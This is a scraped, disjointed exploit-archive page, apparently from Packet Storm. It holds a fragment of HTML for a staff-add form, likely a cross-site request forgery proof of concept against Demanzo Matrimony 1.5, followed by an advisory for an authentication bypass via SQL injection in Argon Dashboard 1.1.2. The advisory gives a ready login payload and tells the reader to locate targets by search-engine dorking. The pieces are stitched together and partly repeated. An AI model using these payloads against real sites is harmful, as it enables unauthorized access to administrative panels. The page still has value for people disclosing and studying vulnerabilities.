                              <label class="control-label col-md-4 frm_pd">Name <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Password <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Email ID <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="email" id="email" value="" type="email" class="form-control" placeholder="Enter Email ID">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Gender <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">   
                                    <input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label>  
                                    <input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label>  
                            </div>  
                            </div>

                                                           <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label frm_pd col-md-2">Designation <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation">     
                                </div>  
                            </div>   

                                                        <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label col-md-2 frm_pd">Address  <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea>    
                                </div>  
                            </div> 

                                                          
                                
                                  
                                    
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                  
                            

                                                          
                                
                                  
                                       
                                       
                              
                            

                                                        <div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad">  
                              <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status <span class="red">*</span> : </label>  
                                <div class="col-lg-8 col-md-10 frm_pd">   
                                    <input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label>  
                                    <input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label>  
                            </div>  
                            </div>

                                                        <div class="col-md-2 col-md-offset-5 col-sm-12">  
                                <input type="submit" class="ctn_btn no_mt1" value="Add" name="add">  
                            </div> 

 Greetings to :===================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|          
==================================================================================================

Demanzo Matrimony 1.5 Cross Site Request Forgery

Argon Dashboard version 1.1.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Argon Dashboard - v1.1.2 Auth By Pass Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit)                                              | | # Vendor    : https://www.creative-tim.com/product/argon-dashboard#                                                              |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 'or''='@gmail.com1 & Pass : 'or''='[+] https://127.0.0.1/aadarshinstrumentscom/admin/examples/inquiry.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Source

Packet Storm